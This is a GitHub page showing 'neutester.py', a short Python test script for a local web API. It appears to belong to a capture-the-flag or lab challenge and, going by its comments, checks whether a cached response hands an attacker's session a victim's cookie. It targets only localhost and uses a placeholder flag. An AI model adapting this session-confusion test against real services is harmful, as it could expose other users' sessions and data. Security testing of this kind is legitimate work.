This repository was archived by the owner on Dec 1, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathneutester.py
More file actions
82 lines (68 loc) · 1.69 KB
/
neutester.py
File metadata and controls
82 lines (68 loc) · 1.69 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
import requests
import sys
import json
import time
import random
BASE = "http://127.0.0.1:9090"
#BASE = "http://localhost:5000"
COOKIE_NAME = "session"
FLAG = "FLAG{TESTVAL}"
proxies = {
"http": "http://localhost:8080"
}
#proxies = None
def create(session, mission, short):
r = session.post(
f"{BASE}/api/create",
json = {
"name": mission,
"short": short
}, proxies = proxies)
return r.json()["secret"]
def login(session, mission, secret):
r = session.post(
f"{BASE}/api/authenticate",
json = {
"mission": mission,
"secret": secret
}, proxies = proxies)
def logout(session):
session.get(
f"{BASE}/api/logout"
, proxies = proxies)
def get_missioninfo(session, mission):
session.get(
f"{BASE}/api/missioninfo/{mission}"
, proxies = proxies)
def get_missionlist(session):
return session.get(
f"{BASE}/api/missions"
, proxies = proxies).json()
def add_data(session, data):
session.post(
f"{BASE}/api/add_data",
json = {
"data": data
}, proxies = proxies)
def get_data(session, secret = None):
j = {}
if secret != None:
j["secret"] = secret
return session.post(
f"{BASE}/api/get_data"
, json = j
, proxies = proxies)
# Sessions
s_attack = requests.Session()
# Attacker logs in, get cookie
name = "imgstester" + str(random.randint(1, 1000))
pwd = create(s_attack, name, "nodesc")
login(s_attack, name, pwd)
get_missioninfo(s_attack, name)
#assert s_attack.cookies[COOKIE_NAME] == cookie_attack # this fails when the test is run the second time before the cache expired
print("Sleeping..")
time.sleep(5)
# Verify data in attacker
data = get_data(s_attack, pwd) # get_data, but the s_attack session now has the s_victim cookie
logout(s_attack)
print(data.content)